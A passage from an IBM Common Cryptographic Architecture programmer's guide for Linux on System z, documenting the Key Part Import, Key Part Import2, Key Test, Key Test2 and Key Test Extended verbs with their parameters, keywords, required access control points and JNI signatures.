+Table31.KeywordsforKeyPartImportcontrolinformation +Keyword Description +Keypart(One,required) +FIRST Thiskeywordspecifiesthataninitialkeypartisbeingentered.Thisverbreturnsthiskey-part +encryptedbythemasterkeyinthekeytokenthatyousupplied. +ADD-PART Thiskeywordspecifiesthatadditionalkey-partinformationisprovided. +COMPLETE Thiskeywordspecifiesthatthekey-partbitshallbeturnedoffinthecontrolvectorofthekey +renderingthekeyfullyoperational.Notethatnokey-partinformationisaddedtothekeywith +thiskeyword. +MIDDLE Thiskeywordspecifiesthatanintermediatekeypart,whichisneitherthefirstkeypartnorthe +lastkeypart,isbeingentered.Notethatthecommandcontrolpointforthiskeywordisthe +sameasthatfortheLASTkeywordanddifferentfromthatfortheADD-PARTkeyword. +LAST Thiskeywordspecifiesthatthelastkeypartisbeingentered.Thekey-partbitisturnedoffin +thecontrolvector. +RETRKPR Akeylabelmustbepassedasthekey_identifier.Thiskeylabelcorrespondstoakeystoredin +aKPITregisterinsidethecrypto-card(notinhostkeystorage).Thekeyinthatregisterhas +beenloadedbylabelandkeypartusingtheKPITverbbytheTKE.ThiskeywordforKPI +allowstheusertotellthecardtowrapthatkey(itmustbeinthecompletestate)usingthe +masterkey,placeitinaninternaltoken,andreturnthattokentotheuser. +ThiskeywordappliesonlywhenusingIBMSystemz. +| Key-wrappingmethod(One,optional) +|| USECONFG Specifiestowrapthekeyusingtheconfigurationsettingforthedefaultwrappingmethod.This +| keywordisignoredforAESkeys.Thisisthedefault.ThiskeywordwasintroducedwithCCA +| 4.1.0. +|| WRAP-ENH Specifiestowrapthekeyusingthelegacywrappingmethod.ThiskeywordisignoredforAES +| keys.ThiskeywordwasintroducedwithCCA4.1.0. +|| WRAP-ECB Specifiestowrapthekeyusingtheenhancedwrappingmethod.ValidonlyforDESkeys.This +| keywordwasintroducedwithCCA4.1.0. +key_part +Direction: Input Type: String +A16-byte field containing the clear key part to be entered. If the key is a single-length key, the key +part must be left-justified and padded on the right with zeros. This field is ignored if COMPLETE is +specified. +key_identifier +Direction: Input/Output Type: String +A64-byte field containing an internal token or a label of an existing key in the key storage file. If +rule_array is FIRST, this field is the skeleton of an internal token of a single- or double-length key with +the KEY-PART marking. If rule_array is MIDDLE or LAST, this is an internal token or key label of a +partially combined key. Depending on the input format, the accumulated partial or complete key is +returned as an internal token or as an updated key storage file record. The returned key_identifier will +be encrypted under the current master key. +Chapter5.ManagingAESandDEScryptographickeys 137 + +Key Part Import (CSNBKPI) +Restrictions +If a label is specified on key_identifier, the label must be unique. If more than one record is found, the verb +fails. +You must have access control point 'Key Part Import - Unrestricted' explicitly enabled. Otherwise, current +applications will fail with either of the following conditions: +v The first eight bytes of key identifier is different than the second eight bytesAND the first eight bytes of +the combined key are the same as the last second eight bytes +v The first eight bytes of key identifier is the same as the second eight bytesAND the first eight bytes of +the combined key are different than the second eight bytes. +Required commands +This verb requires the following commands to be enabled in the active role: +|||| +Rule-arraykeyword Offset Command +||| FIRST X'001B' KeyPartImport-firstkeypart +||| ADD-PART X'0278' KeyPartImport-ADD-PART +||| COMPLETE X'0279' KeyPartImport-COMPLETE +||| MIDDLEorLAST X'001C' KeyPartImport-middleandlast +||| MIDDLEorLAST X'027A' KeyPartImport-Unrestricted +||| WRAP-ECBorWRAP-ENHused,anddefault X'0140' KeyPartImport-Allowwrappingoverride +|| key-wrappingmethodsettingdoesnotmatch keywords +| keyword +| +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBKPIJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBKPIJ are shown here. +Format +public native void CSNBKPIJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_part, +byte[] key_identifier ); +138 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Part Import2 (CSNBKPI2) +Key Part Import2 (CSNBKPI2) +| +| Use the Key Part Import2 verb to combine, by XORing, the clear key parts of any key type and return the +| combined key value either in a variable-length internal key token or as an update to the key storage file. +| Before you use the Key Part Import2 verb for the first key part, you must use the Key Token Build2 verb to +| create the variable-length internal key token into which the key will be imported. Subsequent key parts are +| combined with the first part in variable-length internal key token form, or as a label from the key storage +| file. +| The preferred way to specify key parts is FIRST,ADD-PART, and COMPLETE in the rule_array. Only +| when the combined key parts have been marked as COMPLETE can the key token be used in any +| cryptographic operation. The partial key can be passed to the Key Token Change2 verb for +| re-encipherment, in case building the key was started during a master key change operation. The partial +| key can be passed to the Key Token Parse verb, in order to discover how the key token was originally +| specified, if researching an old partial key. Partial keys can also be passed to the Key Test, Key Test2, and +| Key Test Extended verbs. +| Key parts can also be specified as FIRST, MIDDLE, or LAST in the rule_array.ADD-PART or MIDDLE can +| be executed multiple times for as many key parts as necessary. Only when the LAST part has been +| combined can the key token be used by any other verb. +| New applications should employ theADD-PART and COMPLETE keywords in lieu of the MIDDLE and +| LAST keywords in order to ensure a separation of responsibilities between someone who can add key-part +| information and someone who can declare that appropriate information has been accumulated in a key. +| On each call to Key Part Import2 (except with the COMPLETE keyword), specify the number of bits to use +| for the clear key part. Place the clear key part in the key_part parameter, and specify the number of bits +| using the key_part_length variable.Any extraneous bits of key_part data will be ignored. +| Consider using the Key Test2 verb to ensure a correct key value has been accumulated prior to using the +| COMPLETE option to mark the key as fully operational. +Format +| +|| +CSNBKPI2( +| return_code, +| reason_code, +| exit_data_length, +| exit_data, +| rule_array_count, +| rule_array, +| key_part_bit_length, +| key_part, +| key_identifier_length, +| key_identifier ) +| +Parameters +| +| For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +| “Parameters common to all verbs” on page 14. +| rule_array_count +|| Direction: Input Type: Integer +| The number of keywords you supplied in the rule_array parameter. This value must be 2 or 3. +| rule_array +| +Chapter5.ManagingAESandDEScryptographickeys 139 + +Key Part Import2 (CSNBKPI2) +|| Direction: Input Type: Integer +| The rule_array contains keywords that provide control information to the verb. The keywords must be +| in contiguous storage with each of the keywords left-justified in its own 8-byte location and padded on +| the right with blanks. The rule_array keywords are described in Table32. +|| Table32.KeywordsforKeyPartImport2controlinformation +|| Keyword Description +| Tokenalgorithm(Required) +|| HMAC SpecifiestoimportanHMACkeytoken. +| Keypart(Onerequired) +|| FIRST Thiskeywordspecifiesthataninitialkeypartisbeingentered.Thisverbreturnsthiskey-part +| encryptedbythemasterkeyinthekeytokenthatyousupplied. +|| ADD-PART Thiskeywordspecifiesthatadditionalkey-partinformationisprovided. +|| COMPLETE Thiskeywordspecifiesthatthekey-partbitshallbeturnedoffinthecontrolvectorofthekey +| renderingthekeyfullyoperational.Notethatnokey-partinformationisaddedtothekeywiththis +| keyword. +| Splitknowledge(Optional,requiredwhenkeywordFIRSTisused) +|| MIN3PART Specifiesthatthekeymustbeenteredinatleastthreeparts. +|| MIN2PART Specifiesthatthekeymustbeenteredinatleasttwoparts. +|| MIN1PART Specifiesthatthekeymustbeenteredinatleastonepart. +| +| key_part_bit_length +|| Direction: Input Type: Integer +| The length of the clear key in bits. This indicates the bit length of the key supplied in the key_part +| field. Valid lengths are 80 - 2048 for FIRST andADD-PART keywords. This value must be 0 for the +| COMPLETE keyword. +| key_part +|| Direction: Input Type: String +| This parameter is the clear key value to be applied. The key part must be left-justified. This parameter +| is ignored if COMPLETE is specified. +| key_identifier_length +|| Direction: Input/Output Type: Integer +| On input, the length of the buffer for the key_identifier parameter. For labels, the value is 64. The +| key_identifier must be left justified in the buffer. The buffer must be large enough to receive the +| updated token. The maximum value is 725. The output token will be longer when the first key part is +| imported. +| On output, the actual length of the token returned to the caller. For labels, the value will be 64. +| key_identifier +|| Direction: Input/Output Type: String +| The parameter containing an internal token or a 64-byte label of an existing key storage file record. If +| rule_array is FIRST, the key is a skeleton token. If rule_array isADD-PART, this is an internal token or +| the label of a key storage file record of a partially combined key. Depending on the input format, the +| accumulated partial or complete key is returned as an internal token or as an updated record in a key +| storage file. The returned key_identifier will be encrypted under the current master key. +140 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Part Import2 (CSNBKPI2) +Restrictions +| +| This verb was introduced with CCA4.1.0. +Required commands +| +| This verb requires the following commands to be enabled in the active role: +|||| +Rule-arraykeyword Offset Command +||| FIRSTandMIN3PART X'0297' KeyPartImport2-Loadfirstkeypart_ +| require3keyparts +||| FIRSTandMIN2PART X'0298' KeyPartImport2-Loadfirstkeypart_ +| require2keyparts +||| FIRSTandMIN1PART X'0299' KeyPartImport2-Loadfirstkeypart_ +| require1keyparts +||| ADD-PART X'029A' KeyPartImport2-Addsecondof3ormore +| keyparts +|| X'029B' KeyPartImport2-Addlastrequiredkeypart +|| X'029C' KeyPartImport2-Addoptionalkeypart +||| COMPLETE X'029D' KeyPartImport2-Completekey +| +Usage notes +| +| On each call to Key Part Import2, also specify a rule-array keyword to define the service action: FIRST, +| ADD-PART, or COMPLETE. +| v With the FIRST keyword, the input key-token must be a skeleton token (no key material). Use of the +| FIRST keyword requires that the Load First Key Part2 access control point be enabled in the default +| role. +| v With theADD-PART keyword, the service XORs the clear key-part with the key value in the input +| key-token. Use of theADD-PART keyword requires that anAdd Key Part2 access control point be +| enabled in the default role. The key remains incomplete in the updated key token returned from the +| service. +| v With the COMPLETE keyword, the KEY-PART bit is set off in the updated key token that is returned +| from the service. Use of the COMPLETE keyword requires that the Complete Key Part2 access control +| point be enabled in the default role. The key_part_bit_length parameter must be set to zero. +JNI version +| +| This verb has a Java Native Interface (JNI) version, which is named CSNBKPI2J. See “Building Java +| applications to use with the CCAJNI” on page 16. +| The parameters for CSNBKPI2J are shown here. +Chapter5.ManagingAESandDEScryptographickeys 141 + +Key Part Import2 (CSNBKPI2) +| +| Format +| public native void CSNBKPI2J( +| hikmNativeInteger return_code, +| hikmNativeInteger reason_code, +| hikmNativeInteger exit_data_length, +| byte[] exit_data, +| hikmNativeInteger rule_array_count, +| byte[] rule_array, +| hikmNativeInteger key_part_bit_length, +| hikmNativeInteger key_part, +| hikmNativeInteger key_identifier_length, +|| hikmNativeInteger key_identifier ); +| +| +| +142 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Test (CSNBKYT) +Key Test (CSNBKYT) +Use the Key Test verb to generate or verify a secure, cryptographic verification pattern for keys.Akey to +test can be in the clear or encrypted under the master key. In addition, the verb permits you to test the +CCAmaster keys. Keywords in the rule_array parameter specify whether the verb generates or verifies a +verification pattern. +This algorithm is supported for clear and encrypted single and double length keys. Single, double and +triple length keys are also supported with the ENC-ZERO algorithm. Clear triple length keys are not +supported. See “Cryptographic key-verification techniques” on page 491. +With the default method, the verb generates a verification pattern and it creates and cryptographically +processes a random number. This verb returns the random number with the verification pattern. +When the verb tests a verification pattern against a key, you must supply the random number and the +verification pattern from a previous call to Key Test. This verb returns the verification result in the return +and reason codes. See Table33 for details. +Table33.Verificationpatterninputandoutput +ForkeywordGENERATE +random_numbervariable verification_patternvariable +Method Oninput Onoutput Oninput Onoutput +ENC-ZERO Unused Unused Unused Containsthe4-byte +verificationpatterninthe +high-orderfourbytesof +thevariable.The +low-orderfourbytesare +unspecified. +MDC-4 Unused Containsthelower Unused Containstheupper +(leftmost)eightbytesof (rightmost)eightbytes +theMDC-4hash. oftheMDC-4hash. +SHA-1 Unused Containsthelower Unused Containstheuppereight +(leftmost)eightbytesof bytesoftheSHA-1 +theSHA-1verification verificationpattern. +pattern. +SHA-256 Unused Unused Unused SHA-256based +verificationpattern +ForkeywordVERIFY +random_numbervariable verification_patternvariable +Method Oninput Onoutput Oninput Onoutput +ENC-ZERO Unused Unused Containsthe4-byte Unused +verificationpatterninthe +high-orderfourbytesof +thevariable.The +low-orderfourbytesare +unspecified. +MDC-4 Containsthelower Unused Containstheupper Unused +(leftmost)eightbytesof (rightmost)eightbytes +theMDC-4hash. oftheMDC-4hash. +SHA-1 Containsthelower Unused Containstheuppereight Unused +(leftmost)eightbytesof bytesoftheSHA-1 +theSHA-1verification verificationpattern. +pattern. +Chapter5.ManagingAESandDEScryptographickeys 143 + +Key Test (CSNBKYT) +Table33.Verificationpatterninputandoutput (continued) +ForkeywordGENERATE +random_numbervariable verification_patternvariable +Method Oninput Onoutput Oninput Onoutput +SHA-256 Unused Unused SHA-256based Unused +verificationpattern +Format +CSNBKYT( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_identifier, +random_number, +verification_pattern ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 2, 3, 4, or 5. +rule_array +Direction: Input Type: String +Two to five keywords provide control information to the verb. The keywords must be in contiguous +storage with each of the keywords left-justified in its own 8-byte location and padded on the right with +blanks. The rule_array keywords are described in Table34. +Table34.KeywordsforKeyTestcontrolinformation +Keyword Description +| Keyrule(One,required) +KEY-CLR Specifiesthekeysuppliedinkey_identifierisasingle-lengthclearkey. +KEY-CLRD Specifiesthekeysuppliedinkey_identifierisadouble-lengthclearkey. +KEY-ENC Specifiesthekeysuppliedinkey_identifierisasingle-lengthencryptedkey. +KEY-ENCD Specifiesthekeysuppliedinkey_identifierisadouble-lengthencryptedkey. +KEY-KM Specifiesthatthetargetisthemasterkeyregister. +KEY-NKM Specifiesthatthetargetisthenewmaster-keyregister. +KEY-OKM Specifiesthatthetargetistheoldmaster-keyregister. +CLR-A128 Processa128-bitAESclear-keyorclear-keypart. +CLR-A192 Processa192-bitAESclear-keyorclear-keypart. +CLR-A256 Processa256-bitAESclear-keyorclear-keypart. +144 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Test (CSNBKYT) +Table34.KeywordsforKeyTestcontrolinformation (continued) +Keyword Description +TOKEN ProcessanAESclearorencryptedkeycontainedinanAESkey-token. +Master-keyselector(One,optional).UseonlywithKEY-KM,KEY-NKM,orKEY-OKMkeywords. +AES-MK ProcessoneoftheAESmaster-keyregisters. +|| APKA-MK ProcessoneoftheAPKAmaster-keyregisters.ThiskeywordwasintroducedwithCCA4.1.0. +ASYM-MK Specifiesuseofonlytheasymmetricmaster-keyregisters. +SYM-MK Specifiesuseofonlythesymmetricmaster-keyregisters. +| ProcessRule(One,required) +GENERATE Generateaverificationpatternforthekeysuppliedinkey_identifier. +VERIFY Verifyaverificationpatternforthekeysuppliedinkey_identifier. +| ParityAdjustment(One,optional) +ADJUST Adjusttheparityoftestkeytooddbeforegeneratingorverifyingtheverificationpattern.The +key_identifierfielditselfisnotadjusted. +NOADJUST Donotadjusttheparityoftestkeytooddbeforegeneratingorverifyingtheverificationpattern.Thisis +thedefault. +VerificationProcessRule(One,optional) +ENC-ZERO Specifiesuseofthe"encryptedzeros"method.UseonlywithKEY-CLR,KEY-CLRD,KEY-ENC,or +KEY-ENCDkeywords. +MDC-4 SpecifiesuseoftheMDC-4masterkeyverificationmethod.UseonlywiththeKEY-KM,KEY-NKM, +KEY-OKMkeywords.Youmustspecifyonemaster-keyselectorkeywordtousethiskeyword. +SHA-1 SpecifiesuseoftheSHA-1master-key-verificationmethod.UseonlywithKEY-KM,KEY-NKM,or +KEY-OKMkeywords.Youmustspecifyonemaster-keyselectorkeywordtousethiskeyword. +SHA-256 SpecifiesuseoftheSHA-256master-key-verificationmethod. +key_identifier +Direction: Input/Output Type: String +The key for which to generate or verify the verification pattern. The parameter is a 64-byte string of an +internal token, key label, or a clear key value left-justified. +Note: If you supply a key label for this parameter, it must be unique in the key storage file. +random_number +Direction: Input/Output Type: String +This is an 8-byte field that contains a random number supplied as input for the test pattern verification +process and returned as output with the test pattern generation process. With the ENC-ZERO method, +the random number is not used, but it still must be provided. +verification_pattern +Direction: Input/Output Type: String +This is an 8-byte field that contains a verification pattern supplied as input for the test pattern +verification process and returned as output with the test pattern generation process. With the +ENC-ZERO method, the high-order four bytes contain the verification data. For more detail, see +“Cryptographic key-verification techniques” on page 491. +Restrictions +None +Chapter5.ManagingAESandDEScryptographickeys 145 + +Key Test (CSNBKYT) +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +Usage notes +You can generate the verification pattern for a key when you generate the key. You can distribute the +pattern with the key and it can be verified at the receiving node. In this way, users can ensure using the +same key at the sending and receiving locations. You can generate and verify keys of any combination of +key forms, that is, clear, operational or external. +The parity of the key is not tested. +For triple-length keys, use KEY-ENC or KEY-ENCD with ENC-ZERO. Clear triple-length keys are not +supported. +In the Transaction Security System, KEY-ENC and KEY-ENCD both support enciphered single-length and +double-length keys. They use the key-form bits in byte 5 of CV to determine the length of the key. To be +consistent, in this implementation of CCA, both KEY-ENC and KEY-ENCD handle single- and +double-length keys. Both products effectively ignore the keywords, which are supplied only for compatibility +reasons. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBKYTJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBKYTJ are shown here. +Format +public native void CSNBKYTJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_identifier, +byte[] random_number, +byte[] verification_pattern ); +146 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Test2 (CSNBKYT2) +Key Test2 (CSNBKYT2) +| +| Use the Key Test2 verb to generate or verify a secure, cryptographic verification pattern for keys contained +| in a variable-length symmetric key-token.Akey to test can be in the clear or encrypted under the master +| key. In addition, the verb permits you to test the CCAmaster keys. Keywords in the rule_array parameter +| specify whether the verb generates or verifies a verification pattern. See “Cryptographic key-verification +| techniques” on page 491. +| When the verb tests a verification pattern against a key, you must supply the verification pattern from a +| previous call to Key Test2. This verb returns the verification result in the return code and reason code. +Format +| +|| +CSNBKYT2( +| return_code, +| reason_code, +| exit_data_length, +| exit_data, +| rule_array_count, +| rule_array, +| key_identifier_length, +| key_identifier, +| key_encrypting_key_identifier_length, +| key_encrypting_key_identifier, +| reserved_length, +| reserved, +| verification_pattern_length, +| verification_pattern ) +| +Parameters +| +| For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +| “Parameters common to all verbs” on page 14. +| rule_array_count +|| Direction: Input Type: Integer +| The number of keywords you supplied in the rule_array parameter. This value must be 2 or 3. +| rule_array +|| Direction: Input Type: String +| The rule_array contains keywords that provide control information to the verb. The keywords must be +| in contiguous storage with each of the keywords left-justified in its own 8-byte location and padded on +| the right with blanks. The rule_array keywords are described in Table35. +|| Table35.KeywordsforKeyTest2controlinformation +|| Keyword Description +| Tokenalgorithm(Required) +|| HMAC SpecifiesthekeytokenisanHMACkeytoken. +| Processrule(Onerequired) +|| GENERATE Generateaverificationpatternforthespecifiedkey. +|| VERIFY Verifythataverificationpatternmatchesthespecifiedkey. +| Verificationpatterncalculationalgorithm(Oneoptional) +|| SHA2VP1 SpecifiestousetheSHA-256basedverificationpatterncalculation +| algorithm.Thisisthedefault. +| +Chapter5.ManagingAESandDEScryptographickeys 147 + +Key Test2 (CSNBKYT2) +| key_identifier_length +|| Direction: Input Type: Integer +| The length of the key_identifier is bytes. The maximum value is 725. +| key_identifier +|| Direction: Input Type: String +| The key for which to generate or verify the verification pattern. The parameter is a variable length +| string of an internal token or the 64-byte label of a key in key storage. +| key_encrypting_key_identifier_length +|| Direction: Input Type: Integer +| The byte length of the key_encrypting_key_identifier parameter. This value must be 0. +| key_encrypting_key_identifier +|| Direction: Input/Output Type: String +| This parameter is ignored. +| reserved_length +|| Direction: Input Type: Integer +| The byte length of the reserved parameter. This value must be 0. +| reserved +|| Direction: Input/Output Type: String +| This parameter is ignored. +| verification_pattern_length +|| Direction: Input/Output Type: Integer +| The byte length of the verification_pattern parameter. +| On input: For GENERATE, the length must be at least 8 bytes; For VERIFY, the length must be 8 +| bytes. +| On output for GENERATE, the length of the verification pattern returned. +| verification_pattern +|| Direction: Input/Output Type: String +| For GENERATE, the verification pattern generated for the key. +| For VERIFY, the supplied verification pattern to be verified. +Restrictions +| +| This verb was introduced with CCA4.1.0. +Required commands +| +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +Usage notes +| +| You can generate the verification pattern for a key when you generate the key. You can distribute the +| pattern with the key and it can be verified at the receiving node. In this way, users can ensure using the +| same key at the sending and receiving locations. You can generate and verify keys of any combination of +| key forms, that is, clear, operational or external. +148 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Test2 (CSNBKYT2) +JNI version +| +| This verb has a Java Native Interface (JNI) version, which is named CSNBKYT2J. See “Building Java +| applications to use with the CCAJNI” on page 16. +| The parameters for CSNBKYT2J are shown here. +| +| Format +| public native void CSNBKYT2J( +| hikmNativeInteger return_code, +| hikmNativeInteger reason_code, +| hikmNativeInteger exit_data_length, +| byte[] exit_data, +| hikmNativeInteger rule_array_count, +| byte[] rule_array, +| hikmNativeInteger key_identifier_length, +| byte[] key_identifier, +| hikmNativeInteger key_encrypting_key_identifier_length, +| byte[] key_encrypting_key_identifier, +| hikmNativeInteger reserved_length, +| byte[] reserved, +| hikmNativeInteger verification_pattern_length, +|| byte[] verification_pattern ); +| +| +| +Chapter5.ManagingAESandDEScryptographickeys 149 + +Key Test Extended (CSNBKYTX) +Key Test Extended (CSNBKYTX) +This verb is essentially the same as “Key Test (CSNBKYT)” on page 143, except: +v In addition to operating on internal keys and key parts, this verb also operates on external keys and key +parts. +v This verb does not operate on clear keys, and does not accept rule_array keywords CLR-A128, +CLR-A192, CLR-A256, KEY-CLR, and KEY-CLRD. +See also “Key Test (CSNBKYT)” on page 143 for operating only on internal keys. +Use this verb to verify the value of a key or key part in an external or internal key token. This verb +supports two options: +GENERATE To compute and return a verification pattern for a specified key. +VERIFY To verify that a passed verification pattern is correct for the specified key. +The verification pattern and the verification process do not reveal any information about +the value of the tested key, other than equivalency of two key values. Several verification +algorithms are supported. +This verb supports testing ofAES (Release 3.30 or later), DES, and PKAmaster keys, and enciphered +keys or key parts. rule_array keywords are used to specify information about the target key that is not +implicit from other verb parameters. +When testing the master keys, there are two sets of rule_array keywords to indicate what key to test: +1. The SYM-MK,ASYM-MK, andAES-MK (Release 3.30 or later) master-key selector keywords indicate +whether to test the DES (symmetric) master key, the PKA(asymmetric) master key, or theAES master +key. +2. The KEY-KM, KEY-NKM, and KEY-OKM key or key-part rule keywords choose among the +current-master-key register, the new-master-key register, and the old-master-key register. +Not specifying a master-key selector keyword (SYM-MK,ASYM-MK, orAES-MK) means that the DES +(symmetric) and PKA(asymmetric) master keys have the same value, and that you want to test that value. +Several key test algorithms are supported by the verb. See “Cryptographic key-verification techniques” on +page 491. Some are implicitly selected based on the type of key you are testing, while others are optional +and selected by specifying a verification process rule keyword. You can specify one of the following: +1. The ENC-ZERO keyword to encrypt a block of binary zeros with the specified key. This verb returns +the leftmost 32 bits of the encryption result as the verification pattern. The encrypted block consists of +16 bytes of binary zeros forAES, and eight bytes for DES and Triple-DES keys. This method is valid +only with the TOKEN keyword forAES, and KEY-ENC and KEY-ENCD keywords for DES. +2. The MDC-4 keyword to compute a 16-byte verification pattern using the MDC-4 algorithm. This +keyword is valid only when computing the verification pattern for a DES (symmetric) or PKA +(asymmetric) master key. +3. The SHA-1 keyword to compute the verification pattern using the SHA-1 hashing method. This +keyword is valid only when computing the verification pattern for the DES (symmetric) or PKA +(asymmetric) master key. +4. The SHA-256 keyword to compute the verification pattern using the SHA-256 hashing method. This +keyword is valid only when computing the verification pattern for anAES key. +Table33 on page 143 describes the use of the random_number and verification_pattern fields for each of +the available verification methods. +150 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Test Extended (CSNBKYTX) +Note: For historical reasons, the verification information is passed in two 8-byte variables pointed to by +the random_number and verification_pattern parameters. The GENERATE option returns +information in these two variables, and the VERIFY option uses the information provided in these +two variables. If the verb cannot verify the information provided, it returns a return code of 4 and a +reason code of 1. For simplicity, these two variables can be two 8-byte elements of a 16-byte array, +which is processed by your application program as a single quantity. Both parameters must be +coded when calling theAPI. +DES and Triple-DES keys reserve the low-order bit of each byte for parity. If parity is used, the low-order +bit is set so that the total number of '1' bits in the byte is odd. These parity adjustment keywords allow you +to control how the Key Test Extended verb handles the parity bits: +NOADJUST Specifies not to alter the parity bit values in any way. This is the default. +ADJUST Specifies to modify the low-order bit of each byte as necessary for odd parity. +This is done on the cleartext value of the key before the verification pattern is computed. +The parity adjustment is performed only on a temporary copy of the key within the card, +and does not affect the key value in the key_identifier parameter. +Format +CSNBKYTX( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_identifier, +random_number, +verification_pattern ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 2, 3, 4, or 5. +rule_array +Direction: Input Type:Array +Between two and five keywords provide control information to the verb. The keywords must be in +contiguous storage with each of the keywords left-justified in its own 8-byte location and padded on +the right with blanks. The rule_array keywords are described in Table36. +Table36.KeywordsforKeyTestExtendedcontrolinformation +Keyword Description +Processrule(Onerequired) +GENERATE Generateaverificationpatternforthekeysuppliedinkey_identifier. +VERIFY Verifyaverificationpatternforthekeysuppliedinkey_identifier. +Keyorkey-partrule(Onerequired) +Chapter5.ManagingAESandDEScryptographickeys 151 + +Key Test Extended (CSNBKYTX) +Table36.KeywordsforKeyTestExtendedcontrolinformation (continued) +Keyword Description +KEY-ENC Specifiesthekeysuppliedinkey_identifierisasingle-lengthencryptedkey. +KEY-ENCD Specifiesthekeysuppliedinkey_identifierisadouble-lengthencryptedkey. +KEY-KM Specifiesthatthetargetisthemasterkeyregister. +KEY-NKM Specifiesthatthetargetisthenewmaster-keyregister. +KEY-OKM Specifiesthatthetargetistheoldmaster-keyregister. +TOKEN ProcessanAESclearorencryptedkeycontainedinanAESkey-token. +Master-keyselector(One,optional).UseonlywithKEY-KM,KEY-NKM,orKEY-OKMkeywords.Thedefaultisto +processtheASYM-MKandSYM-MKkeyregisters,whichmusthavethesamekeyforthedefaulttobevalid. +AES-MK ProcessoneoftheAESmaster-keyregisters. +|| APKA-MK ProcessoneoftheAPKAmaster-keyregisters.ThiskeywordwasintroducedwithCCA4.1.0. +ASYM-MK Specifiesuseofonlytheasymmetricmaster-keyregisters. +SYM-MK Specifiesuseofonlythesymmetricmaster-keyregisters. +ParityAdjustment(One,optional)NotvalidwithAES-MKMaster-keyselectorkeyword. +ADJUST Adjusttheparityoftestkeytooddbeforegeneratingorverifyingtheverificationpattern.The +key_identifierfielditselfisnotadjusted. +NOADJUST Donotadjusttheparityoftestkeytooddbeforegeneratingorverifyingtheverificationpattern.Thisis +thedefault. +VerificationProcessRule(One,optional)FortheAESmasterkey,SHA-256isthedefault.FortheDESorPKA +masterkeys,thedefaultistouseSHA-1ifthefirstandthirdpartsofthekeyaredifferent,ortheIBMz/OSmethodif +thefirstandthirdpartsofthekeyarethesame. +ENC-ZERO Specifiesuseofthe"encryptedzeros"method.UseonlywithKEY-CLR,KEY-CLRD,KEY-ENC,or +KEY-ENCDkeywords. +MDC-4 SpecifiesuseoftheMDC-4masterkeyverificationmethod.UseonlywiththeKEY-KM,KEY-NKM, +KEY-OKMkeywords.Youmustspecifyonemaster-keyselectorkeywordtousethiskeyword. +SHA-1 SpecifiesuseoftheSHA-1master-key-verificationmethod.UseonlywithKEY-KM,KEY-NKM,or +KEY-OKMkeywords.Youmustspecifyonemaster-keyselectorkeywordtousethiskeyword. +SHA-256 SpecifiesuseoftheSHA-256master-key-verificationmethod. +key_identifier +Direction: Input Type: String +Apointer to a string variable containing an internal or external key-token, a key label that identifies an +internal or external key-token record, or a clear key. +The key token contains the key or the key part used to generate or verify the verification pattern. +random_number +Direction: Input/Output Type: String +Apointer to a string variable containing a number the verb might use in the verification process. When +you specify the GENERATE keyword, the verb returns the random number. When you specify the +VERIFY keyword, you must supply the number. With the ENC-ZERO method, the random_number +variable is not used but must be specified. +verification_pattern +Direction: Input/Output Type: String +Apointer to a string variable containing the binary verification pattern. When you specify the +GENERATE keyword, the verb returns the verification pattern. When you specify the VERIFY keyword, +152 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Test Extended (CSNBKYTX) +you must supply the verification pattern. With the ENC-ZERO method, the verification data occupies +the high-order four bytes, while the low-order four bytes are unspecified (the data is passed between +your application and the cryptographic engine but is otherwise unused). For more detail, see +“Cryptographic key-verification techniques” on page 491. +kek_key_identifier +Direction: Input Type: String +Apointer to a string variable containing an operational key-token or the key label of an operational +key-token record containing an IMPORTER or EXPORTER key-encrypting key. If the key_identifier +parameter does not identify an external key-token, the contents of the kek_key_identifier variable +should contain a null DES key-token. +Restrictions +1. Releases earlier than Release 3.20 do not support theADJUST and NOADJUST parity adjustment +keywords. +2. AES keys and keywords are not supported in releases before Release 3.30. +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +Usage notes +You can generate the verification pattern for a key when you generate the key. You can distribute the +pattern with the key and it can be verified at the receiving node. In this way, users can ensure using the +same key at the sending and receiving locations. You can generate and verify keys of any combination of +key forms: clear, operational, or external. +The parity of the key is not tested. +For triple-length keys, use KEY-ENC or KEY-ENCD with ENC-ZERO. Clear triple-length keys are not +supported. +In the Transaction Security System, KEY-ENC and KEY-ENCD both support enciphered 